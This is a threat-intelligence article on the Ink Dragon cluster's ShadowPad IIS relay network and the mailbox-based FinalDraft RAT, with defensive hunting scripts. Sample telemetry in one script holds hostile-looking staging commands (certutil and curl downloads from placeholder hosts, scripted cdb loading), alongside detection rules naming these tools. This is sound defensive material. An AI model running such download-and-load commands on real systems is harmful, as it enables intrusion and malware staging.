Check Point Research’s excavation of the Ink Dragon cluster reveals a precise, quietly ruthless evolution in modern espionage tradecraft: instead of treating each victim as a disposable data source, the operators systematically convert compromised IIS and SharePoint servers into active nodes in a distributed ShadowPad relay network, using victims as command-and-control hops and blending C2 traffic into legitimate HTTP behavior to maximize stealth and survivability.
Source: Check Point Research Ink Dragon's Relay Network and Stealthy Offensive Operation
Background / Overview
Ink Dragon (also tracked under labels such as Earth Alux, REF7707, and CL‑STA‑0049 in vendor reports) is a sustained espionage cluster focused on government, telecom, and public‑sector infrastructure. The group’s operations combine mature software engineering with disciplined operational hygiene: multi‑stage loaders, living‑off‑the‑land staging, credential harvesting, and victim-as-infrastructure relay logic. Recent activity shows a geographic expansion into European government targets while maintaining operations in Southeast Asia and South America.

At the center of the activity is a ShadowPad IIS Listener module that converts infected IIS worker processes into dual-purpose implants: they act both as a local backdoor and as a transparent HTTP relay capable of pairing remote “servers” and “clients,” then streaming traffic between them so that operators can issue commands to downstream implants without directly contacting them. This relay architecture blurs provenance, multiplies routing options, and dramatically increases an intrusion’s operational endurance.
The Big Picture: Why this matters
- Victim becomes infrastructure. Each breached perimeter server can be repurposed as a hop—meaning defenders who see local compromise must assume the host may be serving external campaigns elsewhere.
- High stealth, low signal. Malicious listeners bind URL prefixes and fall back to normal IIS behavior for unmatched requests, making network and application telemetry appear legitimate.
- Flexible C2 channels. The actor uses multiple web‑centric access paths (ViewState deserialization, SharePoint/ToolShell exploits, living‑off‑the‑land utilities), plus cloud‑native channels such as Outlook/Microsoft Graph for resilient, whitelisted egress.
Technical narrative: the observed kill chain
1. Initial access: web‑centric and predictable
Ink Dragon’s documented entry points emphasize web software weaknesses and misconfigurations:
- ViewState deserialization: When ASP.NET applications expose predictable or leaked machineKey values, attackers can forge __VIEWSTATE values to trigger unsafe deserialization and remote code execution. This continues to be a reliable vector where machineKey material is mismanaged.
- SharePoint / ToolShell exploitation: The actor also leverages SharePoint exploit chains (publicly discussed as ToolShell in vendor reporting) to achieve unauthenticated RCE and web shell deployment on on‑prem SharePoint instances. Observed mass scanning during initial exploitation waves points to a limited set of actors with early exploit access. Treat public attributions and specific CVE rollups as operational intelligence to verify against vendor advisories in your environment.
2. Local consolidation and credential harvesting
Once code execution in w3wp.exe is achieved, the actor:
- Recovers IIS cryptographic secrets and configuration blobs (machineKey / DecryptionKey), decrypts local artifacts, and extracts IIS worker/app‑pool credentials that often have elevated rights across a web farm. Reused service accounts in web farms frequently enable lateral pivoting with minimal network noise.
- Uses in‑process escalation tactics (e.g., local privilege exploits such as PrintNotifyPotato or similar) to gain SYSTEM, then performs LSASS dumping (custom tools like LalsDumper were observed) and extracts registry hives (SAM, SYSTEM) for offline cracking and NTDS.dit exfiltration. These steps accelerate domain‑wide privilege escalation.
3. Lateral movement and persistence patterns
Ink Dragon’s lateral playbook relies on native protocols and layered persistence:
- RDP proxies and tunnels for interactive movement; operators tunnel RDP through compromised web servers to internal workstations and servers, exposing machine names and enabling hands‑on‑keyboard sessions.
- Sideload triads and in‑memory loaders: common structure observed is EXE + malicious DLL + encrypted blob (TMP). The benign‑looking EXE loads the malicious DLL which decrypts and executes the core in memory and then erases staging files to reduce disk artifacts. Examples include MFC‑based DLL loaders and CDB/WinDbg‑based scripted loaders that patch memory and execute shellcode.
- Persistence via scheduled tasks with plausible names (e.g., SYSCHECK), or as disguised services (e.g., WindowsTempUpdate), often running under SYSTEM. Many staged binaries were found to be signed by legitimate vendors but with mismatched OriginalFileName metadata — a clear masquerade to reduce suspicion.
The ShadowPad IIS Listener: design and implications
How the listener works (high level)
The ShadowPad IIS Listener module integrates into the IIS worker process and:
- Registers wildcard HTTP(S) URL prefixes using HttpAddUrl, enabling the implant to bind arbitrary host/path patterns and silently intercept matching requests.
- Decrypts and validates inbound payloads according to a proprietary protocol; if a request does not fit the protocol it returns real site content or legitimate error pages so normal traffic continues unperturbed.
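The defender-side counterpart of the HttpAddUrl behaviour described above is to list what HTTP.sys actually has registered and diff it against the IIS site bindings that should explain every prefix. The following is an added example, not code from Check Point or from the ShadowPad analysis, and it also serves the “compare to known bindings” item in the detection section further down. The netsh output and the binding list are constructed samples; the parser assumes the `netsh http show servicestate` layout in which prefixes follow a `Registered URLs:` header, and the mapping from an IIS binding (`ip:port:host`) to the HTTP.sys prefix IIS registers is a simplified assumption (`+` and `*` are folded into one wildcard token so either spelling compares equal).

```python
"""Find HTTP.sys URL prefixes that no configured IIS binding explains.

Added example (not Check Point's code).  A ShadowPad-style IIS listener
registers its own prefixes with HttpAddUrl, so a registered prefix that cannot
be derived from any IIS site binding is a high-signal lead.  All sample data
below is constructed; the netsh layout and binding-to-prefix mapping are
assumptions for illustration.
"""
import re
from urllib.parse import urlsplit

# Constructed, abridged sample of `netsh http show servicestate` output.
SAMPLE_SERVICESTATE = """\
Snapshot of HTTP service state (Server Session View):
-----------------------------------------------------

Server session ID: FF00000020000001
    Version: 2.0
    State: Active
    URL groups:
    URL group ID: FE00000040000001
        State: Active
        Request queue name: Request queue is unnamed.
        Number of registered URLs: 2
        Registered URLs:
            HTTP://*:80/
            HTTPS://WWW.EXAMPLE.COM:443/
    URL group ID: FE00000040000002
        State: Active
        Request queue name: Request queue is unnamed.
        Number of registered URLs: 1
        Registered URLs:
            HTTP://+:80/api/sync/
"""

# Constructed IIS site bindings in appcmd / Get-WebBinding form: (protocol, "ip:port:host").
SAMPLE_BINDINGS = [
    ("http", "*:80:"),
    ("https", "*:443:www.example.com"),
]

# Any line that consists solely of an http:// or https:// prefix.
URL_RE = re.compile(r"^\s*(https?://\S+)\s*$", re.IGNORECASE | re.MULTILINE)


def normalize_prefix(prefix):
    """Canonical (scheme, host, port, path); '+' and '*' become one wildcard token."""
    parts = urlsplit(prefix.lower())
    host = parts.hostname or ""
    if host in ("+", "*"):
        host = "<wildcard>"
    port = parts.port or (443 if parts.scheme == "https" else 80)
    path = parts.path or "/"
    if not path.endswith("/"):
        path += "/"
    return (parts.scheme, host, port, path)


def binding_to_prefix(protocol, binding_info):
    """Map an IIS binding 'ip:port:host' to the prefix IIS would register (simplified assumption)."""
    ip, port, host = binding_info.split(":", 2)
    if host:
        return normalize_prefix(f"{protocol}://{host}:{port}/")
    if ip in ("", "*"):
        return normalize_prefix(f"{protocol}://*:{port}/")
    return normalize_prefix(f"{protocol}://{ip}:{port}/")


def registered_prefixes(servicestate_text):
    """Extract every registered URL prefix from netsh servicestate output."""
    return [m.group(1) for m in URL_RE.finditer(servicestate_text)]


def unexplained_prefixes(servicestate_text, bindings):
    """Return registered prefixes that no IIS site binding accounts for."""
    expected = {binding_to_prefix(proto, info) for proto, info in bindings}
    return [raw for raw in registered_prefixes(servicestate_text)
            if normalize_prefix(raw) not in expected]


if __name__ == "__main__":
    for prefix in unexplained_prefixes(SAMPLE_SERVICESTATE, SAMPLE_BINDINGS):
        print("unexplained HTTP.sys prefix:", prefix)
```

On a real host, feed the output of `netsh http show servicestate` and the bindings from `Get-WebBinding` (or `appcmd list site`) into the same two functions; an extra path-scoped prefix under a wildcard host, like the `/api/sync/` entry in the sample, is exactly the kind of registration that IIS configuration never produces on its own.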
Distributed relay logic
The listener maintains two registries—server and client lists—and automatically pairs entries to create transparent forwarding tunnels. When paired, the compromised host forwards raw byte streams bidirectionally between the server and client endpoints, with no further protocol transformation. This yields:
- Multi‑hop chains linking unrelated victims, so a downstream implant can receive commands via one or more intermediary victims.
- Internal pivoting where the listener relays commands deeper into the same network to implants with no direct external reach.
Dual capability: relay + backdoor
Beyond transparent relaying, the same IIS module exposes a full ShadowPad command surface (file ops, process/service control, network inspection, interactive shells, staging, and more). That duality—relay node and hands‑on access point—makes each compromised IIS server exponentially more valuable to the operator.
The FinalDraft family: a cloud‑native, mailbox‑based RAT
FinalDraft is Ink Dragon’s resilient, cloud‑native RAT that abuses Microsoft Graph and Outlook draft messages to hide C2 traffic inside legitimate mail flows:
- The implant stores and uses a refresh token to obtain OAuth access tokens, using the Graph API to post and retrieve specially‑formatted drafts (subjects prefixed by session IDs). Payloads are base64‑encoded, AES‑encrypted, and compressed to hide content inside mail drafts. This design leverages Microsoft cloud endpoints that are commonly whitelisted, making egress filtering ineffective.
- FinalDraft supports flexible beacon scheduling, RDP activity harvesting, high‑throughput background exfiltration workers, and a modular command framework. It can harvest RDP MRU entries and Event Log session records to build lateral‑movement maps.
- An important operational detail: FinalDraft’s configuration is often machine‑specific (XORed with a ProductId hash or a fixed string), and the implant caches tokens under predictable registry keys for persistence.
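The mailbox-side behaviour described above (drafts created and removed in quick succession, session-ID-prefixed subjects, base64 bodies) is what a cloud detection rule has to key on, since the egress itself looks like Graph traffic. The block below is an added example, not code from Check Point or Microsoft: it runs a churn-and-content heuristic over constructed audit records shaped loosely like mailbox audit events for the Drafts folder. The field names (`mailbox`, `operation`, `folder`, `subject`, `body`, `time`), the session-ID subject shape (a run of hex followed by a separator), the ten-minute window and the six-event threshold are all assumptions for illustration; the page does not give FinalDraft’s exact subject format.

```python
"""Flag mailbox draft churn consistent with draft-based C2 (FinalDraft-style).

Added example, not Check Point's or Microsoft's code.  Input records are
constructed and loosely shaped like mailbox audit events; field names, the
assumed session-ID subject pattern and the thresholds are illustrative.
"""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed shape of a session-ID-prefixed subject: 8+ hex chars then a separator.
SESSION_PREFIX = re.compile(r"^[0-9a-f]{8,}[-_:]", re.IGNORECASE)
# A body that is one long run of base64 alphabet (32+ chars) with valid padding.
B64_RUN = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")

WINDOW = timedelta(minutes=10)   # assumed churn window
CHURN_THRESHOLD = 6              # assumed: create/delete events within WINDOW


def _b64(n):
    """Constructed base64 'payload' standing in for an encrypted, compressed chunk."""
    return base64.b64encode(f"constructed-encrypted-chunk-{n:04d}".encode()).decode()


# Constructed sample: one mailbox with C2-like churn, one with ordinary use.
T0 = datetime(2025, 1, 15, 3, 0, 0)
SAMPLE_EVENTS = []
for i in range(4):
    SAMPLE_EVENTS.append({"mailbox": "svc-portal@example.com", "operation": "Create",
                          "folder": "Drafts", "subject": f"a1b2c3d4e5f6-{i:04d}",
                          "body": _b64(i), "time": T0 + timedelta(minutes=2 * i)})
    SAMPLE_EVENTS.append({"mailbox": "svc-portal@example.com", "operation": "SoftDelete",
                          "folder": "Drafts", "subject": f"a1b2c3d4e5f6-{i:04d}",
                          "body": "", "time": T0 + timedelta(minutes=2 * i + 1)})
SAMPLE_EVENTS.append({"mailbox": "alice@example.com", "operation": "Create",
                      "folder": "Drafts", "subject": "Re: Q3 budget",
                      "body": "Hi Bob, attached is the draft.", "time": T0})


def looks_base64(text):
    """True if the body is a single base64 blob that actually decodes."""
    s = "".join(text.split())
    if not B64_RUN.match(s) or len(s) % 4:
        return False
    try:
        base64.b64decode(s, validate=True)
        return True
    except ValueError:
        return False


def draft_churn_alerts(events, window=WINDOW, threshold=CHURN_THRESHOLD):
    """Per mailbox: peak Drafts create/delete events in any window, plus content signals."""
    per_box = defaultdict(list)
    for e in events:
        if e["folder"] == "Drafts" and e["operation"] in ("Create", "SoftDelete", "HardDelete"):
            per_box[e["mailbox"]].append(e)

    alerts = {}
    for mailbox, evs in per_box.items():
        evs.sort(key=lambda e: e["time"])
        times = [e["time"] for e in evs]
        peak, lo = 0, 0
        for hi in range(len(times)):          # sliding window over sorted timestamps
            while times[hi] - times[lo] > window:
                lo += 1
            peak = max(peak, hi - lo + 1)
        creates = [e for e in evs if e["operation"] == "Create"]
        session_subjects = sum(1 for e in creates if SESSION_PREFIX.match(e["subject"]))
        b64_bodies = sum(1 for e in creates if looks_base64(e["body"]))
        # Churn alone is noisy (autosave); require at least one content signal too.
        if peak >= threshold and (session_subjects or b64_bodies):
            alerts[mailbox] = {"peak_events_in_window": peak,
                               "session_prefixed_subjects": session_subjects,
                               "base64_bodies": b64_bodies}
    return alerts


if __name__ == "__main__":
    for box, detail in draft_churn_alerts(SAMPLE_EVENTS).items():
        print(box, detail)
```

Autosave in Outlook on the web also produces draft churn, which is why the rule requires a content signal as well; in a real deployment the records would come from unified audit log or Graph activity exports rather than the constructed list, and the thresholds would be tuned against a baseline of legitimate draft activity per mailbox.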
Toolset and TTP catalogue (observed components)
- ShadowPad IIS Listener Module — core C2 & relay node (IIS module with URL bindings).
- ShadowPad Loader triads — EXE + DLL + TMP encrypted payloads; side‑load and in‑memory execution.
- CDBLoader — debugger‑driven memory patching and shellcode host; uses scripted config to run shellcode and load payloads.
- LalsDumper — custom LSASS dumping chain that registers an SSP, forces LSASS to load attacker code, and writes compressed memory dumps using direct syscalls for EDR evasion.
- 032Loader — sideload/host‑entropy‑based loader using InstallDate as a key; decrypts via RC4‑like algorithm and MapViewOfFile.
- FinalDraft — mailbox/Graph API RAT with modular exfiltration, remote execution, and token management.
Victimology and operational footprint
Observed targets concentrate on government and public‑sector organizations across Southeast Asia, South America, Africa, and — increasingly — Europe. The actor’s choice to repurpose perimeter servers as relays multiplies the operational value of each intrusion: European victims have been observed serving as C2 hops for operations against targets in other regions. Overlaps with other clusters (e.g., RudePanda/REF3927) show convergent targeting of exposed IIS/SharePoint infrastructure—sometimes the same vulnerable server is exploited by multiple actors independently.
Cross‑validation and caveats
- Multiple vendor writeups and incident responders corroborate the broad mechanics: ShadowPad’s use of DLL sideloading and in‑memory loaders, final‑stage mailbox C2, and large‑overlay DLLs used by loader chains. These independent confirmations raise confidence in the technical details.
- Attribution to a specific nation state remains inherently probabilistic. Public reporting often links ShadowPad‑style tooling and tradecraft to PRC‑aligned clusters, but tooling reuse and sales complicate direct attribution; defenders should focus on objective containment and eradication rather than sole reliance on attribution.
- Some public claim elements (specific CVE lists, raw IP IOCs, or actor labels) evolve rapidly. Organizations should treat IOCs as scouting inputs and rely primarily on behavior‑based detection and thorough forensic analysis.
Detection and hunting guidance (practical)
Prioritize high‑signal artifacts and behaviors that fit the relay‑centric model:
- Hunt for unusual IIS module insertions, unexpected HttpAddUrl bindings, or wildcard URL prefix registrations at the OS/HTTP API level. Enumerate HTTP.sys / URL ACLs where possible and compare to known bindings.
- Search for large or oddly padded DLLs in System32 or web application directories (>10s of MB) and MFC‑based DLLs loading nonstandard code flow. These are common triad loaders and sideload artifacts.
- Monitor for living‑off‑the‑land staging: suspicious curl/certutil usage to pull Base64/AES blobs, or CDB/cdb.exe executions with config scripts that patch process memory. Scripted debugger usage is a distinctive TTP to watch for.
- Watch for Microsoft Graph / Outlook draft anomalies: repeated creation/deletion of drafts with session‑prefixed subjects, drafts containing Base64 blobs, or refresh‑token usage patterns in registry locations consistent with FinalDraft. Add Graph API behavior analytics to your cloud detection rules.
- Hunt for LSASS dump artifacts and evidence of SSP registration or direct‑syscall dumping activity. Custom LSASS dumpers often write compressed dump files to %TEMP% with unique naming conventions.
- Network hunts: look for seemingly legitimate HTTP flows that traverse between unrelated organizational IP ranges but follow unusual timing/size patterns consistent with relay‑paired sessions; the IIS debug strings (when recovered) can map forwarded payload sizes and endpoints.
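The living‑off‑the‑land and scripted‑debugger items in the list above, together with the earlier point that code execution starts inside w3wp.exe, reduce to a few process‑creation rules. The block below is an added example and not Check Point’s code: it applies those rules to constructed Sysmon‑style Event ID 1 records. The field names (`Image`, `ParentImage`, `CommandLine`, `ProcessId`), the tool lists and the flag patterns are assumptions for illustration, and the URLs and paths in the sample are placeholders rather than indicators from the report.

```python
"""Hunt process-creation telemetry for scripted-debugger loaders, LOLBin
staging and tools spawned by the IIS worker process.

Added example (not Check Point's code).  The JSON lines are constructed
Sysmon-style Event ID 1 records with assumed field names; rule lists and
regexes are illustrative assumptions, and all URLs/paths are placeholders.
"""
import json
import re
from pathlib import PureWindowsPath

# Constructed sample telemetry (JSON lines). Backslashes are JSON-escaped.
SAMPLE_EVENTS = r"""
{"EventID":1,"ProcessId":4120,"Image":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","ParentImage":"C:\\Windows\\System32\\svchost.exe","CommandLine":"w3wp.exe -ap DefaultAppPool"}
{"EventID":1,"ProcessId":5208,"Image":"C:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","CommandLine":"cmd.exe /c whoami"}
{"EventID":1,"ProcessId":5216,"Image":"C:\\Windows\\System32\\certutil.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","CommandLine":"certutil.exe -urlcache -split -f http://placeholder.invalid/stage.txt C:\\Windows\\Temp\\stage.txt"}
{"EventID":1,"ProcessId":5230,"Image":"C:\\Windows\\System32\\certutil.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","CommandLine":"certutil.exe -decode C:\\Windows\\Temp\\stage.txt C:\\Windows\\Temp\\stage.dll"}
{"EventID":1,"ProcessId":5244,"Image":"C:\\Program Files\\Debugging Tools\\cdb.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cdb.exe -cf C:\\Windows\\Temp\\cfg.txt -o notepad.exe"}
{"EventID":1,"ProcessId":6012,"Image":"C:\\Windows\\System32\\notepad.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"notepad.exe"}
{"EventID":1,"ProcessId":6020,"Image":"C:\\Windows\\System32\\curl.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"curl.exe -o C:\\ProgramData\\update.bin https://placeholder.invalid/update.bin"}
"""

DEBUGGERS = {"cdb.exe", "windbg.exe", "kd.exe", "ntsd.exe"}   # assumed list
WEB_WORKERS = {"w3wp.exe"}
STAGING_TOOLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "curl.exe", "cdb.exe"}

SCRIPT_FLAGS = re.compile(r"(?:^|\s)-(?:cf|c)\s", re.IGNORECASE)          # cdb script/command file
CERTUTIL_FLAGS = re.compile(r"-(?:decode|urlcache)\b", re.IGNORECASE)      # decode or fetch
CURL_OUTPUT = re.compile(r"(?:^|\s)(?:-o|--output)\s", re.IGNORECASE)      # write fetched file


def image_name(path):
    """Lower-cased file name of a Windows image path ('' if missing)."""
    return PureWindowsPath(path).name.lower()


def classify(event):
    """Return the list of rule names a single process-creation event matches."""
    img = image_name(event.get("Image", ""))
    parent = image_name(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    if parent in WEB_WORKERS and img in STAGING_TOOLS:
        hits.append("iis_worker_spawned_tool")          # shell/tool born from w3wp.exe
    if img in DEBUGGERS and SCRIPT_FLAGS.search(cmd):
        hits.append("scripted_debugger_loader")         # cdb/windbg driven by a script file
    if img == "certutil.exe" and CERTUTIL_FLAGS.search(cmd):
        hits.append("certutil_staging")                 # certutil used to fetch/decode blobs
    if img == "curl.exe" and CURL_OUTPUT.search(cmd):
        hits.append("curl_download_to_disk")            # curl writing a payload to disk
    return hits


def hunt(jsonl_text):
    """Apply the rules to every Event ID 1 record; return (rule, pid, command line) tuples."""
    findings = []
    for line in jsonl_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 1:
            continue
        for rule in classify(ev):
            findings.append((rule, ev["ProcessId"], ev["CommandLine"]))
    return findings


if __name__ == "__main__":
    for rule, pid, cmd in hunt(SAMPLE_EVENTS):
        print(f"{rule:28s} pid={pid} {cmd}")
```

The `iis_worker_spawned_tool` rule is the one worth weighting highest: an IIS worker process has no business launching cmd.exe, certutil.exe or a debugger, and when such a child also matches one of the staging rules within a short time window the chain is the ViewState/SharePoint-to-loader sequence described above.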
Mitigation checklist (prioritized)
- Immediately inventory and patch internet‑facing IIS and SharePoint servers; rotate any machineKey/service account credentials that could have leaked. If machineKey material is public or predictable, treat the site as compromised until proven clean.
- Harden IIS: enumerate and lock down HttpAddUrl bindings, restrict wildcard URL prefix registrations, and implement allow‑lists at the network edge for management ports.
- Apply strict egress controls and inspect cloud API usage: enable Graph API audit logging, require least‑privilege app registrations, and rotate refresh tokens. Monitor Outlook draft activity and conditional access for unusual mail flows.
- Treat WSUS and other trusted distribution services as crown jewels: apply emergency patches for known unsafe deserialization issues and restrict external exposure. (Examples from related ShadowPad campaigns show WSUS is a high‑impact abuse vector.)
- Centralize telemetry: forward IIS logs, Sysmon process/create/load events, EDR kernel events, and cloud API logs to a SIEM for correlation; enable script‑block and command‑line logging.
- Be conservative with remediation: given the relay model and memory‑resident implants, assume full rebuilds of high‑value servers until you can prove scope is contained.
Strengths, risks and strategic assessment
Notable strengths of Ink Dragon’s model
- Operational camouflage: Using legitimate IIS behavior and Microsoft cloud services materially reduces signature‑based detection opportunities.
- Resilience through reuse: Every new victim can be immediately repurposed as a relay hop, enabling pivoting around network blocks and takedowns.
- Modular, mature tooling: A multi‑stage loader architecture and a rich command set (ShadowPad, FinalDraft) give operators fine control over collection, exfiltration, and persistence.
Key operational risks for defenders
- Hidden global mesh: The relay network means an internal remediation can be undermined by unsuspected external hops that continue to relay commands. Failure to map cross‑victim channels leaves an organization vulnerable to reactivation.
- Whitelisted egress channels: Cloud APIs like Microsoft Graph are often allowed outbound; embedding C2 in drafts bypasses egress controls and makes network detection far harder.
- Rapid IOC fade and tooling reuse: File hashes and specific IPs age quickly; behavioral detections and operational playbooks are more durable than static lists.
Conclusion
Ink Dragon’s approach is a practical demonstration of a higher‑order espionage objective: turn the world’s perimeter servers into persistent infrastructure. The ShadowPad IIS Listener concept—binding into legitimate webserver behavior, pairing nodes into relays, and simultaneously exposing a fully functional backdoor—represents an advanced operational model that multiplies risk for defenders while reducing attacker exposure.

Defenders must adapt by treating internet‑facing web servers as potential infrastructure nodes for adversaries, hardening not just the host but the downstream trust relationships those hosts enable. Effective response requires pairing cloud and host telemetry, hunting for application‑level anomalies (IIS URL ACLs, debugger/scripted loader usage, and Graph API draft anomalies), and assuming that single‑machine cleanup is rarely sufficient when attackers are building cross‑victim relay meshes.
(In cases where specific exploit details, CVE IDs, or particular IoCs are referenced in public reporting, verify the exact CVE numbers and mitigation guidance with vendor advisories and current threat feeds before operational action; some exploit tokens and attributions evolve rapidly and should be validated during triage.)